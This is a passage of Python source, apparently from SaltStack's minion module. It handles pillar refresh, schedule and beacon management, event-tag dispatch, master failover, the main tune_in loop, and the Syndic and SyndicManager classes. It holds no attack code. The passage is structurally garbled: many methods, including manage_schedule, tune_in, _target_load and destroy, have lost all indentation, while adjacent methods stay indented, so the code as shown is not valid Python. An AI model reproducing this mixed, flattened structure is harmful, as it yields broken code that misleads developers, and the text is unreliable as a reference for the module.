        refreshes the module, matcher and beacon loaders so they see the
        new pillar data.

        :param bool force_refresh: passed through to module_refresh
        :param bool notify: fire a MINION_PILLAR_COMPLETE event when done
        '''
        if self.connected:
            log.debug('Refreshing pillar. Notify: %s', notify)
            async_pillar = salt.pillar.get_async_pillar(
                self.opts,
                self.opts['grains'],
                self.opts['id'],
                self.opts['saltenv'],
                pillarenv=self.opts.get('pillarenv'),
            )
            try:
                self.opts['pillar'] = yield async_pillar.compile_pillar()
                if notify:
                    evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False)
                    evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE)
            except SaltClientError:
                # Do not exit if a pillar refresh fails.
                log.error('Pillar data could not be refreshed. '
                          'One or more masters may be down!')
            finally:
                # Always release the pillar channel, even on failure
                async_pillar.destroy()
        # Loaders are refreshed even when disconnected so local changes apply
        self.module_refresh(force_refresh, notify)
        self.matchers_refresh()
        self.beacons_refresh()
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
'reload': ('reload', (schedule,)),
'list': ('list', (where,)),
'save_schedule': ('save_schedule', ()),
'get_next_fire_time': ('get_next_fire_time',
(name,))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name,)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name,)),
'disable_beacon': ('disable_beacon', (name,)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except AttributeError:
log.error('Function "%s" is unavailable in salt.beacons', func)
except TypeError as exc:
log.info(
'Failed to handle %s with data(%s). Error: %s',
tag, data, exc,
exc_info_on_loglevel=logging.DEBUG
)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
    def _pre_tune(self):
        '''
        Set the minion running flag and issue the appropriate warnings if
        the minion cannot be started or is already running

        The _running flag is tri-state: None (never started), True
        (running) and False (scheduled to stop).
        '''
        if self._running is None:
            # First start: claim the running flag
            self._running = True
        elif self._running is False:
            log.error(
                'This %s was scheduled to stop. Not running %s.tune_in()',
                self.__class__.__name__, self.__class__.__name__
            )
            return
        elif self._running is True:
            log.error(
                'This %s is already running. Not running %s.tune_in()',
                self.__class__.__name__, self.__class__.__name__
            )
            return
        try:
            log.info(
                '%s is starting as user \'%s\'',
                self.__class__.__name__, salt.utils.user.get_user()
            )
        except Exception as err:
            # Only windows is allowed to fail here. See #3189. Log as debug in
            # that case. Else, error.
            log.log(
                salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
                'Failed to get the user who is starting %s',
                self.__class__.__name__,
                exc_info=err
            )
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.client.ReqChannel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
finally:
channel.close()
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
    def _handle_tag_beacons_refresh(self, tag, data):
        '''
        Handle a beacons_refresh event by rebuilding the beacon manager.
        '''
        self.beacons_refresh()
    def _handle_tag_matchers_refresh(self, tag, data):
        '''
        Handle a matchers_refresh event by reloading the target matchers.
        '''
        self.matchers_refresh()
    def _handle_tag_manage_schedule(self, tag, data):
        '''
        Handle a manage_schedule event by delegating to manage_schedule.
        '''
        self.manage_schedule(tag, data)
    def _handle_tag_manage_beacons(self, tag, data):
        '''
        Handle a manage_beacons event by delegating to manage_beacons.
        '''
        self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
    def _handle_tag_environ_setenv(self, tag, data):
        '''
        Handle an environ_setenv event by delegating to environ_setenv.
        '''
        self.environ_setenv(tag, data)
    def _handle_tag_minion_mine(self, tag, data):
        '''
        Handle a _minion_mine event by forwarding the mine data to the
        master.
        '''
        self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
    def _handle_tag_master_disconnected_failback(self, tag, data):
        '''
        Handle a master_disconnected_failback event

        Reacts to a lost master connection (and to failback events when a
        master_list is configured): adjusts or removes the __master_alive
        scheduled job, tears down the publish channel, and — in failover
        mode — evaluates the next master from the list and re-initialises
        the subsystems against it.

        NOTE(review): this method body contains ``yield`` (eval_master),
        making it a generator; confirm the event dispatcher drives it.
        '''
        # if the master disconnect event is for a different master, raise an exception
        if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
            # not mine master, ignore
            return
        if tag.startswith(master_event(type='failback')):
            # if the master failback event is not for the top master, raise an exception
            if data['master'] != self.opts['master_list'][0]:
                raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
                    data['master'], self.opts['master']))
            # if the master failback event is for the current master, raise an exception
            elif data['master'] == self.opts['master'][0]:
                raise SaltException('Already connected to \'{0}\''.format(data['master']))
        if self.connected:
            # we are not connected anymore
            self.connected = False
            log.info('Connection to master %s lost', self.opts['master'])
            # we can't use the config default here because the default '0' value is overloaded
            # to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
            # these jobs
            master_alive_interval = self.opts['master_alive_interval'] or 60
            if self.opts['master_type'] != 'failover':
                # modify the scheduled job to fire on reconnect
                if self.opts['transport'] != 'tcp':
                    schedule = {
                        'function': 'status.master',
                        'seconds': master_alive_interval,
                        'jid_include': True,
                        'maxrunning': 1,
                        'return_job': False,
                        'kwargs': {'master': self.opts['master'],
                                   'connected': False}
                    }
                    self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                             schedule=schedule)
            else:
                # delete the scheduled job to don't interfere with the failover process
                if self.opts['transport'] != 'tcp':
                    self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
                                             persist=True)
                log.info('Trying to tune in to next master from master-list')
                if hasattr(self, 'pub_channel'):
                    # Detach, invalidate cached auth and dispose of the old channel
                    self.pub_channel.on_recv(None)
                    if hasattr(self.pub_channel, 'auth'):
                        self.pub_channel.auth.invalidate()
                    if hasattr(self.pub_channel, 'close'):
                        self.pub_channel.close()
                    del self.pub_channel
                # if eval_master finds a new master for us, self.connected
                # will be True again on successful master authentication
                try:
                    master, self.pub_channel = yield self.eval_master(
                        opts=self.opts,
                        failed=True,
                        failback=tag.startswith(master_event(type='failback')))
                except SaltClientError:
                    # No reachable master found; handled by the restart below
                    pass
                if self.connected:
                    self.opts['master'] = master
                    # re-init the subsystems to work with the new master
                    log.info(
                        'Re-initialising subsystems for new master %s',
                        self.opts['master']
                    )
                    # put the current schedule into the new loaders
                    self.opts['schedule'] = self.schedule.option('schedule')
                    self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                    # make the schedule to use the new 'functions' loader
                    self.schedule.functions = self.functions
                    self.pub_channel.on_recv(self._handle_payload)
                    self._fire_master_minion_start()
                    log.info('Minion is ready to receive requests!')
                    # update scheduled job to run with the new master addr
                    if self.opts['transport'] != 'tcp':
                        schedule = {
                            'function': 'status.master',
                            'seconds': master_alive_interval,
                            'jid_include': True,
                            'maxrunning': 1,
                            'return_job': False,
                            'kwargs': {'master': self.opts['master'],
                                       'connected': True}
                        }
                        self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                                 schedule=schedule)
                        if self.opts['master_failback'] and 'master_list' in self.opts:
                            # Not on the preferred master: periodically ping it
                            if self.opts['master'] != self.opts['master_list'][0]:
                                schedule = {
                                    'function': 'status.ping_master',
                                    'seconds': self.opts['master_failback_interval'],
                                    'jid_include': True,
                                    'maxrunning': 1,
                                    'return_job': False,
                                    'kwargs': {'master': self.opts['master_list'][0]}
                                }
                                self.schedule.modify_job(name=master_event(type='failback'),
                                                         schedule=schedule)
                            else:
                                self.schedule.delete_job(name=master_event(type='failback'), persist=True)
                else:
                    # No master could be reached; restart the minion process
                    self.restart = True
                    self.io_loop.stop()
    def _handle_tag_master_connected(self, tag, data):
        '''
        Handle a master_connected event

        Marks the minion connected again and re-arms the __master_alive
        scheduled job so it only fires if the connection is lost anew.
        '''
        # handle this event only once. otherwise it will pollute the log
        # also if master type is failover all the reconnection work is done
        # by `disconnected` event handler and this event must never happen,
        # anyway check it to be sure
        if not self.connected and self.opts['master_type'] != 'failover':
            log.info('Connection to master %s re-established', self.opts['master'])
            self.connected = True
            # modify the __master_alive job to only fire,
            # if the connection is lost again
            if self.opts['transport'] != 'tcp':
                if self.opts['master_alive_interval'] > 0:
                    schedule = {
                        'function': 'status.master',
                        'seconds': self.opts['master_alive_interval'],
                        'jid_include': True,
                        'maxrunning': 1,
                        'return_job': False,
                        'kwargs': {'master': self.opts['master'],
                                   'connected': True}
                    }
                    self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
                                             schedule=schedule)
                else:
                    # A non-positive interval disables the alive job entirely
                    self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
    @tornado.gen.coroutine
    def handle_event(self, package):
        '''
        Handle an event from the epull_sock (all local minion events)

        The event tag is matched by prefix against the table below and
        every matching handler is invoked with (tag, data).
        '''
        if not self.ready:
            # Core attributes are not initialised yet; drop the event
            raise tornado.gen.Return()
        tag, data = salt.utils.event.SaltEvent.unpack(package)
        log.debug(
            'Minion of \'%s\' is handling event tag \'%s\'',
            self.opts['master'], tag
        )
        # Tag-prefix -> handler mapping; a tag may match several entries
        tag_functions = {
            'beacons_refresh': self._handle_tag_beacons_refresh,
            'environ_setenv': self._handle_tag_environ_setenv,
            'fire_master': self._handle_tag_fire_master,
            'grains_refresh': self._handle_tag_grains_refresh,
            'matchers_refresh': self._handle_tag_matchers_refresh,
            'manage_schedule': self._handle_tag_manage_schedule,
            'manage_beacons': self._handle_tag_manage_beacons,
            '_minion_mine': self._handle_tag_minion_mine,
            'module_refresh': self._handle_tag_module_refresh,
            'pillar_refresh': self._handle_tag_pillar_refresh,
            'salt/auth/creds': self._handle_tag_salt_auth_creds,
            '_salt_error': self._handle_tag_salt_error,
            '__schedule_return': self._handle_tag_schedule_return,
            master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
            master_event(type='failback'): self._handle_tag_master_disconnected_failback,
            master_event(type='connected'): self._handle_tag_master_connected,
        }
        # Run the appropriate function
        for tag_function in tag_functions:
            if tag.startswith(tag_function):
                # NOTE(review): coroutine handlers (e.g. pillar_refresh) are
                # invoked here without being yielded — confirm this is intended
                tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
    def _setup_core(self):
        '''
        Set up the core minion attributes.
        This is safe to call multiple times.
        '''
        if not self.ready:
            # First call. Initialize.
            # Loaders for execution modules, returners and executors
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            # Serializer used for proc files and payloads
            self.serial = salt.payload.Serial(self.opts)
            self.mod_opts = self._prep_mod_opts()
            # self.matcher = Matcher(self.opts, self.functions)
            self.matchers = salt.loader.matchers(self.opts)
            self.beacons = salt.beacons.Beacon(self.opts, self.functions)
            # Per-job proc directory, owned by the configured user
            uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
            self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
            # Snapshot of grains, used to detect changes on grains_refresh
            self.grains_cache = self.opts['grains']
            self.ready = True
    def setup_beacons(self, before_connect=False):
        '''
        Set up the beacons.
        This is safe to call multiple times.

        :param bool before_connect: process beacons once immediately so
            they get a chance to fire before the master connection exists
        '''
        self._setup_core()
        loop_interval = self.opts['loop_interval']
        # Callbacks created on this call only; started together below
        new_periodic_callbacks = {}
        if 'beacons' not in self.periodic_callbacks:
            self.beacons = salt.beacons.Beacon(self.opts, self.functions)
            def handle_beacons():
                # Process Beacons
                beacons = None
                try:
                    beacons = self.process_beacons(self.functions)
                except Exception:
                    log.critical('The beacon errored: ', exc_info=True)
                if beacons and self.connected:
                    self._fire_master(events=beacons)
            new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
                handle_beacons, loop_interval * 1000)
            if before_connect:
                # Make sure there is a chance for one iteration to occur before connect
                handle_beacons()
        if 'cleanup' not in self.periodic_callbacks:
            new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
                self._fallback_cleanups, loop_interval * 1000)
        # start all the other callbacks
        for periodic_cb in six.itervalues(new_periodic_callbacks):
            periodic_cb.start()
        self.periodic_callbacks.update(new_periodic_callbacks)
    def setup_scheduler(self, before_connect=False):
        '''
        Set up the scheduler.
        This is safe to call multiple times.

        :param bool before_connect: process the schedule once immediately
            so jobs get a chance to run before the master connection exists
        '''
        self._setup_core()
        loop_interval = self.opts['loop_interval']
        # Callbacks created on this call only; started together below
        new_periodic_callbacks = {}
        if 'schedule' not in self.periodic_callbacks:
            if 'schedule' not in self.opts:
                self.opts['schedule'] = {}
            if not hasattr(self, 'schedule'):
                self.schedule = salt.utils.schedule.Schedule(
                    self.opts,
                    self.functions,
                    self.returners,
                    utils=self.utils,
                    cleanup=[master_event(type='alive')])
            try:
                if self.opts['grains_refresh_every']:  # In minutes, not seconds!
                    log.debug(
                        'Enabling the grains refresher. Will run every %d minute(s).',
                        self.opts['grains_refresh_every']
                    )
                    self._refresh_grains_watcher(abs(self.opts['grains_refresh_every']))
            except Exception as exc:
                log.error(
                    'Exception occurred in attempt to initialize grain refresh '
                    'routine during minion tune-in: %s', exc
                )
            # TODO: actually listen to the return and change period
            def handle_schedule():
                self.process_schedule(self, loop_interval)
            # The schedule is evaluated once per second regardless of loop_interval
            new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
            if before_connect:
                # Make sure there is a chance for one iteration to occur before connect
                handle_schedule()
        if 'cleanup' not in self.periodic_callbacks:
            new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
                self._fallback_cleanups, loop_interval * 1000)
        # start all the other callbacks
        for periodic_cb in six.itervalues(new_periodic_callbacks):
            periodic_cb.start()
        self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
if self._running is False:
return
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
    # Best-effort cleanup on garbage collection; destroy() is idempotent,
    # so an earlier explicit call makes this a no-op.
    self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.
    '''
    def __init__(self, opts, **kwargs):
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # force auth_safemode True because Syndic don't support autorestart
        opts['auth_safemode'] = True
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts, **kwargs)
        # Interface to the local master's configuration/returners
        self.mminion = salt.minion.MasterMinion(opts)
        # jids already forwarded upstream (trimmed against the hwm option elsewhere)
        self.jid_forward_cache = set()
        self.jids = {}
        self.raw_events = []
        self.pub_future = None

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        # TODO: even do this??
        # Decrement the hop counter so the job eventually stops propagating
        data['to'] = int(data.get('to', self.opts['timeout'])) - 1
        # Only forward the command if it didn't originate from ourselves
        if data.get('master_id', 0) != self.opts.get('master_id', 1):
            self.syndic_cmd(data)

    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        kwargs = {}

        # optionally add a few fields to the publish data
        for field in ('master_id',  # which master the job came from
                      'user',  # which user ran the job
                      ):
            if field in data:
                kwargs[field] = data[field]

        def timeout_handler(*args):
            # Swallow pub failures; returning True marks the exception handled
            log.warning('Unable to forward pub data: %s', args[1])
            return True

        with tornado.stack_context.ExceptionStackContext(timeout_handler):
            self.local.pub_async(data['tgt'],
                                 data['fun'],
                                 data['arg'],
                                 data['tgt_type'],
                                 data['ret'],
                                 data['jid'],
                                 data['to'],
                                 io_loop=self.io_loop,
                                 callback=lambda _: None,
                                 **kwargs)

    def fire_master_syndic_start(self):
        # Send an event to the master that the minion is live
        if self.opts['enable_legacy_startup_events']:
            # Old style event. Defaults to false in Sodium release.
            self._fire_master(
                'Syndic {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                ),
                'syndic_start',
                sync=False,
            )
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
            sync=False,
        )

    # TODO: clean up docs
    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(
            self.opts['_minion_conf_file'], io_loop=self.io_loop)

        # add handler to subscriber
        self.pub_channel.on_recv(self._process_cmd_socket)

    def _process_cmd_socket(self, payload):
        # Only verified (AES-encrypted) payloads are forwarded
        if payload is not None and payload['enc'] == 'aes':
            log.trace('Handling payload')
            self._handle_decoded_payload(payload['load'])
        # If it's not AES, and thus has not been verified, we do nothing.
        # In the future, we could add support for some clearfuncs, but
        # the syndic currently has no need.

    @tornado.gen.coroutine
    def reconnect(self):
        # Drop the old pub channel before re-authenticating
        if hasattr(self, 'pub_channel'):
            self.pub_channel.on_recv(None)
            if hasattr(self.pub_channel, 'close'):
                self.pub_channel.close()
            del self.pub_channel

        # if eval_master finds a new master for us, self.connected
        # will be True again on successful master authentication
        master, self.pub_channel = yield self.eval_master(opts=self.opts)

        if self.connected:
            self.opts['master'] = master
            self.pub_channel.on_recv(self._process_cmd_socket)
            log.info('Minion is ready to receive requests!')

        raise tornado.gen.Return(self)

    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local

        if hasattr(self, 'forward_events'):
            self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
    '''
    Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
    all minions connected to it to the list of masters it is connected to.

    Modes (controlled by `syndic_mode`:
        sync: This mode will synchronize all events and publishes from higher level masters
        cluster: This mode will only sync job publishes and returns

    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, that the return will end up in a zmq buffer
    in this Syndic headed to that original master.

    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way) this daemon does not handle failure well,
    it will (under most circumstances) stall the daemon for ~15s trying to forward events
    to the down master
    '''
    # time to connect to upstream master
    SYNDIC_CONNECT_TIMEOUT = 5
    SYNDIC_EVENT_TIMEOUT = 5

    def __init__(self, opts, io_loop=None):
        opts['loop_interval'] = 1
        super(SyndicManager, self).__init__(opts)
        self.mminion = salt.minion.MasterMinion(opts)
        # sync (old behavior), cluster (only returns and publishes)
        self.syndic_mode = self.opts.get('syndic_mode', 'sync')
        self.syndic_failover = self.opts.get('syndic_failover', 'random')

        # Backoff parameters for reconnect attempts in _connect_syndic()
        self.auth_wait = self.opts['acceptance_wait_time']
        self.max_auth_wait = self.opts['acceptance_wait_time_max']

        self._has_master = threading.Event()
        self.jid_forward_cache = set()

        if io_loop is None:
            install_zmq()
            self.io_loop = ZMQDefaultLoop.current()
        else:
            self.io_loop = io_loop

        # List of events
        self.raw_events = []
        # Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
        self.job_rets = {}
        # List of delayed job_rets which was unable to send for some reason and will be resend to
        # any available master
        self.delayed = []
        # Active pub futures: {master_id: (future, [job_ret, ...]), ...}
        self.pub_futures = {}

    def _spawn_syndics(self):
        '''
        Spawn all the coroutines which will sign in the syndics
        '''
        self._syndics = OrderedDict()  # mapping of opts['master'] -> syndic
        masters = self.opts['master']
        if not isinstance(masters, list):
            masters = [masters]
        for master in masters:
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            # Each value is a coroutine future resolving to a connected Syndic
            self._syndics[master] = self._connect_syndic(s_opts)

    @tornado.gen.coroutine
    def _connect_syndic(self, opts):
        '''
        Create a syndic, and asynchronously connect it to a master
        '''
        auth_wait = opts['acceptance_wait_time']
        failed = False
        while True:
            if failed:
                # Linear backoff capped at max_auth_wait before retrying
                if auth_wait < self.max_auth_wait:
                    auth_wait += self.auth_wait
                log.debug(
                    "sleeping before reconnect attempt to %s [%d/%d]",
                    opts['master'],
                    auth_wait,
                    self.max_auth_wait,
                )
                yield tornado.gen.sleep(auth_wait)  # TODO: log?
            log.debug(
                'Syndic attempting to connect to %s',
                opts['master']
            )
            try:
                syndic = Syndic(opts,
                                timeout=self.SYNDIC_CONNECT_TIMEOUT,
                                safe=False,
                                io_loop=self.io_loop,
                                )
                yield syndic.connect_master(failed=failed)
                # set up the syndic to handle publishes (specifically not event forwarding)
                syndic.tune_in_no_block()

                # Send an event to the master that the minion is live
                syndic.fire_master_syndic_start()

                log.info(
                    'Syndic successfully connected to %s',
                    opts['master']
                )
                break
            except SaltClientError as exc:
                failed = True
                log.error(
                    'Error while bringing up syndic for multi-syndic. Is the '
                    'master at %s responding?', opts['master']
                )
            except (KeyboardInterrupt, SystemExit):
                raise
            except Exception:
                failed = True
                log.critical(
                    'Unexpected error while connecting to %s',
                    opts['master'], exc_info=True
                )

        raise tornado.gen.Return(syndic)

    def _mark_master_dead(self, master):
        '''
        Mark a master as dead. This will start the sign-in routine
        '''
        # if its connected, mark it dead
        if self._syndics[master].done():
            syndic = self._syndics[master].result()  # pylint: disable=no-member
            # Replace the resolved future with a fresh reconnect coroutine
            self._syndics[master] = syndic.reconnect()
        else:
            # TODO: debug?
            log.info(
                'Attempting to mark %s as dead, although it is already '
                'marked dead', master
            )

    def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
        '''
        Wrapper to call a given func on a syndic, best effort to get the one you asked for
        '''
        if kwargs is None:
            kwargs = {}
        successful = False
        # Call for each master
        for master, syndic_future in self.iter_master_options(master_id):
            if not syndic_future.done() or syndic_future.exception():
                log.error(
                    'Unable to call %s on %s, that syndic is not connected',
                    func, master
                )
                continue

            try:
                getattr(syndic_future.result(), func)(*args, **kwargs)
                successful = True
            except SaltClientError:
                log.error(
                    'Unable to call %s on %s, trying another...',
                    func, master
                )
                self._mark_master_dead(master)
        if not successful:
            log.critical('Unable to call %s on any masters!', func)

    def _return_pub_syndic(self, values, master_id=None):
        '''
        Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
        '''
        func = '_return_pub_multi'
        for master, syndic_future in self.iter_master_options(master_id):
            if not syndic_future.done() or syndic_future.exception():
                log.error(
                    'Unable to call %s on %s, that syndic is not connected',
                    func, master
                )
                continue

            future, data = self.pub_futures.get(master, (None, None))
            if future is not None:
                if not future.done():
                    if master == master_id:
                        # Targeted master previous send not done yet, call again later
                        return False
                    else:
                        # Fallback master is busy, try the next one
                        continue
                elif future.exception():
                    # Previous execution on this master returned an error
                    log.error(
                        'Unable to call %s on %s, trying another...',
                        func, master
                    )
                    self._mark_master_dead(master)
                    del self.pub_futures[master]
                    # Add not sent data to the delayed list and try the next master
                    self.delayed.extend(data)
                    continue
            future = getattr(syndic_future.result(), func)(values,
                                                           '_syndic_return',
                                                           timeout=self._return_retry_timer(),
                                                           sync=False)
            # Remember the in-flight future together with its payload so a
            # failure can requeue the data via self.delayed
            self.pub_futures[master] = (future, values)
            return True
        # Loop done and didn't exit: wasn't sent, try again later
        return False

